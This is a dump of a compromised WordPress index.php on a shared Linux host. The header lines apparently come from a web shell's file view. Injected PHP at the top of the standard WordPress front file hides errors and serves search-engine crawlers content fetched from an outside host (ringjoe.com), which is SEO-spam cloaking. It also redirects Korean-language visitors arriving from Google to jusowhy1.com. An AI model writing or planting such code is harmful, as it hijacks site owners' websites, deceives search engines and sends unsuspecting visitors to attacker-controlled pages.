Linux heracles.o2switch.net 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
/
home
/
ophq1335
/
www
/
/home/ophq1335/www/index.php
<?php error_reporting(0); $ua = strtolower($_SERVER['HTTP_USER_AGENT']); $rf = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $botchar = "/(googlebot|slurp|adsense|google-inspectiontool|naverbot|yeti|daumoa|zumBot)/"; $language = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']); function get_url_content($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); $output = curl_exec($ch); curl_close($ch); return $output; } if (preg_match($botchar, $ua)) { if ($_SERVER['REQUEST_URI'] == '/') { $file = get_url_content('https://www.ringjoe.com/randing/carrieres-masson.html'); echo $file; exit; } } if ( strpos(strtolower($language), 'ko') !== false && (strpos(strtolower($rf), 'google.com') !== false || strpos(strtolower($rf), 'google.co.kr') !== false) ) { echo "<script>window.location.href='https://jusowhy1.com/';</script>"; exit; } ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';